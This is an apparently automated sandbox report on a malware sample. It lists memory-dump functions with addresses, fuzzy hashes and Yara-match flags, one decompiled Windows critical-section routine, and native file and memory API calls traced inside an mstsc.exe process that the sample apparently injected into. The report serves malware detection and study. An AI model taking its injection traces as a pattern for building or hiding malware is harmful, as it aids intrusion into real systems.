                                          0x004142da
                                          0x00414240
                                          0x004142e4
                                          0x004142e5
                                          0x00414220
                                          0x004142f4
                                          0x004142fc
                                          0x004142ff
                                          0x00414309
                                          0x00414313
                                          0x0041431d
                                          0x00414327
                                          0x0041432f
                                          0x0041433a
                                          0x00414052
                                          0x00414058
                                          0x00414058

                                          Memory Dump Source
                                          • Source File: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5bad271cac1d0bd948b79df21f4a3f04bc934e39ee6bc957ca8657fd7d7f2780
                                          • Instruction ID: ee089e6728b4c5c3cacfe895e626f62b6fd5e67cf460030d3b2ca7c465cd7f8a
                                          • Opcode Fuzzy Hash: 5bad271cac1d0bd948b79df21f4a3f04bc934e39ee6bc957ca8657fd7d7f2780
                                          • Instruction Fuzzy Hash: FBA1A1B5D10119ABCB10DF95C8819FEB7B9FF88704F10855AF915A7301E738AAC1CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0040E429, Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D++k
                                          • API String ID: 0-2906324174
                                          • Opcode ID: 6bac89fb3bd5d4584cacc826572f6b3afe9f4b8bcb2eb6fb920bab463128b479
                                          • Instruction ID: 1ea7df09cf0419312a9f41af48d6958d40c66a72805f5aa74d14514d0b080052
                                          • Opcode Fuzzy Hash: 6bac89fb3bd5d4584cacc826572f6b3afe9f4b8bcb2eb6fb920bab463128b479
                                          • Instruction Fuzzy Hash: F4F02877B006004BC7199E5CE841AE6F3A1DBC13A5F44122EE61CAB081C635746583D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004172F1, Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72a03a881def8a968cf2f41a6a42fd64c3b4378961ea0ffb0ee92d31875b4dfb
                                          • Instruction ID: bd58307b6372431ef7377495694448e696e73d3a42eaec9fa33494ec46b1c5b4
                                          • Opcode Fuzzy Hash: 72a03a881def8a968cf2f41a6a42fd64c3b4378961ea0ffb0ee92d31875b4dfb
                                          • Instruction Fuzzy Hash: 3FA00117F850580144245C8A78410B4E3A4D187076D5472A7DE0CB35006402C425019D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF98A0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                          • Instruction ID: faece846fb01eb6975ba040edea2855791addd639896342270ecce2c82bcfbb4
                                          • Opcode Fuzzy Hash: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                          • Instruction Fuzzy Hash: 9D90026230100402E212619944146060449D7D1385F91C066E142455DD86A58963F172
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9820, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                          • Instruction ID: 7d1b735a22a5b19649e6f154ef82d6e7de2103ddc7700c1ff13656aa99959475
                                          • Opcode Fuzzy Hash: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                          • Instruction Fuzzy Hash: 3D90027224100402E251719944046060449E7D0381F91C066A042455CE86D58A66FAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AFB040, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                          • Instruction ID: f3c8290fe1112d82a342a523a8e0fc6da7db73fbf0a2c8117b1b59587387fdae
                                          • Opcode Fuzzy Hash: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                          • Instruction Fuzzy Hash: B89002A2601140439650B19948044065455E7E1341391C175A0454568C86E88865E2A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF95F0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                          • Instruction ID: 04620aa6bb27d2803001550eeb25a7b6fbdadabc51dcd26a2ee6263f5864c7d4
                                          • Opcode Fuzzy Hash: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                          • Instruction Fuzzy Hash: 3990027220100802E214619948046860445D7D0341F51C065A602465DE96E588A1B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF99D0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                          • Instruction ID: aec79115d10e9f29738519f80e8b9a6866d442d6f00b0e29aa5afbb39a493aa5
                                          • Opcode Fuzzy Hash: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                          • Instruction Fuzzy Hash: E39002A221100042E214619944047060485D7E1341F51C066A215455CCC5A98C71A165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9520, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                          • Instruction ID: b8ce471e7c7a138346ab2ae922cfa3cf3e060195f39402d61ad55433f7c77e70
                                          • Opcode Fuzzy Hash: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                          • Instruction Fuzzy Hash: E69002E2201140929610A2998404B0A4945D7E0341B51C06AE1054568CC5A58861E175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AFAD30, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                          • Instruction ID: 8e6825e6d6d7f7841f06e553eb539a3830a05f6e9ebce233d1af554e9509b2c3
                                          • Opcode Fuzzy Hash: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                          • Instruction Fuzzy Hash: D2900272A0500012E250719948146464446E7E0781B55C065A051455CC89D48A65A3E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9560, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                          • Instruction ID: 646f29aa433657a7f6b878a5bb0b9a24a25762606e4e418690446bbce2054d3c
                                          • Opcode Fuzzy Hash: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                          • Instruction Fuzzy Hash: A7900266221000025255A599060450B0885E7D6391391C069F1416598CC6A18875A361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9950, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                          • Instruction ID: 9f7130504737311f860d6fe042bcfaae4cab1c20afcb2dbc1997fe53db8d0800
                                          • Opcode Fuzzy Hash: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                          • Instruction Fuzzy Hash: DF9002A220140403E250659948046070445D7D0342F51C065A206455DE8AA98C61B175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9A80, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                          • Instruction ID: 40e25c194c463a6d34ac6240e12ccfff647f7827ab26df814024db3cc07110ab
                                          • Opcode Fuzzy Hash: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                          • Instruction Fuzzy Hash: 9B90026220144442E25062994804B0F4545D7E1342F91C06DA415655CCC9958865A761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF96D0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                          • Instruction ID: a37e0ac19c17650d967899adc70e5001e93e6495321535b97a5631664e3e0301
                                          • Opcode Fuzzy Hash: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                          • Instruction Fuzzy Hash: A990027220100842E21061994404B460445D7E0341F51C06AA012465CD8695C861B561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9A10, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                          • Instruction ID: cd24ce0a2d859d488f7286c22e6ed8d97b73ccb990e070c3ae511c639ad71a24
                                          • Opcode Fuzzy Hash: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                          • Instruction Fuzzy Hash: 5590027220140402E210619948087470445D7D0342F51C065A516455DE86E5C8A1B571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9610, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                          • Instruction ID: c30fa2a5d7bca0bf62d3acebf9975c41ed408afd4442960619b60668b41d913b
                                          • Opcode Fuzzy Hash: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                          • Instruction Fuzzy Hash: 9B90027260500802E260719944147460445D7D0341F51C065A002465CD87D58A65B6E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9650, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                          • Instruction ID: 1279ba6ebe872f0cb41666492246e9200b7eb4ee599fedda41a5a78d08eff8db
                                          • Opcode Fuzzy Hash: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                          • Instruction Fuzzy Hash: 5790027220504842E25071994404A460455D7D0345F51C065A006469CD96A58D65F6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AFA3B0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                          • Instruction ID: 3cdc3c48c5b0749e7d2c3f303ad117662c45c56e1d3a974a83615c23a46df001
                                          • Opcode Fuzzy Hash: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                          • Instruction Fuzzy Hash: 7990027220144002E2507199844460B5445E7E0341F51C465E042555CC86958866E261
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9FE0, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                          • Instruction ID: dc216a90dba302d4eee3dbe0a699ba85f72e60d12f14376749cf7359fa4ac185
                                          • Opcode Fuzzy Hash: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                          • Instruction Fuzzy Hash: 0C90027231114402E220619984047060445D7D1341F51C465A082455CD86D588A1B162
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9730, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                          • Instruction ID: c731d0ac36add5569924dd98c56324c24c60b60f050a313278903dd9629f3b26
                                          • Opcode Fuzzy Hash: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                          • Instruction Fuzzy Hash: B290026260500402E250719954187060455D7D0341F51D065A002455CDC6D98A65B6E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9B00, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                          • Instruction ID: b962c6b9c91677f59eabb441c46901add7741bb2ad88d548c5bcf5e74d541984
                                          • Opcode Fuzzy Hash: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                          • Instruction Fuzzy Hash: 3A90026224100802E250719984147070446D7D0741F51C065A002455CD86968975B6F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AFA710, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a939d81e4fd1cabc4e69cc16b17da37559529d47fdebcb83e61d45206b42e60
                                          • Instruction ID: b0ef89177766c76499ee98f0d4d116d662485da101d51f72d532716484006b8a
                                          • Opcode Fuzzy Hash: 8a939d81e4fd1cabc4e69cc16b17da37559529d47fdebcb83e61d45206b42e60
                                          • Instruction Fuzzy Hash: 0890027230100052E610A6D95804A4A4545D7F0341B51D069A401455CC85D48871A161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9760, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e18ec2f0c15f35cfbe453a931314575039e578d2f34dd9247ce4696241ba891
                                          • Instruction ID: 0ec2c6188df7e1179102a9bcf94399cfbd2e6314c960f92fc2271eb9f0db3a05
                                          • Opcode Fuzzy Hash: 4e18ec2f0c15f35cfbe453a931314575039e578d2f34dd9247ce4696241ba891
                                          • Instruction Fuzzy Hash: C690027220100403E210619955087070445D7D0341F51D465A042455CDD6D68861B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9770, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2cf3d7d244ed32073fbe97c3ccb86759d0e12853f3911487fa058b850e0e5100
                                          • Instruction ID: 1ded18e532d4a1d35d656d21d58db86b3ada05586bd016116310bcd9b6db4fe5
                                          • Opcode Fuzzy Hash: 2cf3d7d244ed32073fbe97c3ccb86759d0e12853f3911487fa058b850e0e5100
                                          • Instruction Fuzzy Hash: 5290026220504442E21065995408A060445D7D0345F51D065A106459DDC6B58861F171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AFA770, Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 468828c39cb25db6bc350bfaa0522f6c4405895d078d3004fc98ecfb250469d6
                                          • Instruction ID: 77f12ab8cb500c504d45ff28412b9c3d0df6ce4c0d199c1da5754de67c400e58
                                          • Opcode Fuzzy Hash: 468828c39cb25db6bc350bfaa0522f6c4405895d078d3004fc98ecfb250469d6
                                          • Instruction Fuzzy Hash: 4590027620504442E61065995804A870445D7D0345F51D465A042459CD86D48871F161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00AF9670, Relevance: .0, Instructions: 2COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: fb8dc60d3c8ed19cd1cc89408650463b5fda6c01436fcdf4bfc276a0f888acbd
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B4FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E00B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x00b4fdda
                                          0x00b4fde2
                                          0x00b4fde5
                                          0x00b4fdec
                                          0x00b4fdfa
                                          0x00b4fdff
                                          0x00b4fe0a
                                          0x00b4fe0f
                                          0x00b4fe17
                                          0x00b4fe1e
                                          0x00b4fe19
                                          0x00b4fe19
                                          0x00b4fe19
                                          0x00b4fe20
                                          0x00b4fe21
                                          0x00b4fe22
                                          0x00b4fe25
                                          0x00b4fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4FDFA
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B4FE01
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B4FE2B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                          • Instruction ID: 1f4e07b77d35b4ba5142125bbdeffbf0eaf4acf1dba3b77c0922343a4df4e460
                                          • Opcode Fuzzy Hash: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                          • Instruction Fuzzy Hash: 71F0F632240605BFD6201A45DD02F33BB9AEB45730F240364F628565E2DA62FD30A7F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: mstsc.exe PID: 6488 Parent PID: 3424 mstsc.exeCOMMON

                                          Executed Functions

                                          Function 00489D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00484B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00484B87,007A002E,00000000,00000060,00000000,00000000), ref: 00489DAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 52011c3c90f6022b1a3037fe1c867182a0a0891215738472d93c30b25fe58ddd
                                          • Instruction ID: 5c0defcc5ec7f651a4bc03770e32196c43e1b2b3848e35a6dc4297aa12d79c6d
                                          • Opcode Fuzzy Hash: 52011c3c90f6022b1a3037fe1c867182a0a0891215738472d93c30b25fe58ddd
                                          • Instruction Fuzzy Hash: 9501E4B6204108BFDB48CF98CC95EEB37A9AF8C344F158248FA4D93241C630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00489D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00484B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00484B87,007A002E,00000000,00000060,00000000,00000000), ref: 00489DAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: c3e3c301f0b66c5864b17dea077ea66bbd5c3bf913b17f4a7b866b846c37a235
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: 2DF0B2B2204208ABCB08DF89DC85EEB77ADAF8C754F158648FA0D97241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00489E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL( MH,?,?,00484D20,00000000,FFFFFFFF), ref: 00489EB5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID: MH
                                          • API String ID: 3535843008-4208748312
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: 76c6ce094bb8455547c598097f3c32f248d979dbfdbf0ef61f9aefa161f57633
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: 61D012752002146BD710EB99CC85E97775CEF44750F154499BA585B242C574F51087E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00489E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00484A01,?,?,?,?,00484A01,FFFFFFFF,?,BMH,?,00000000), ref: 00489E55
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: 5b97fdda3572e213ddc7fe311235ae5b3cf25ff3907fe640af5dbc981011c1e1
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: 66F0A4B2200208ABDB14DF89DC81EEB77ADEF8C754F158649BA1DA7241D634E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00489F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00472D11,00002000,00003000,00000004), ref: 00489F79
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: d2bf3eb1affaafc99e37a069ca7528a3049963c33352a2f65e9fe8fc956a9aa9
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: B8F015B2200208ABDB14DF89CC81EAB77ADEF88754F158549FE08A7241C634F810CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

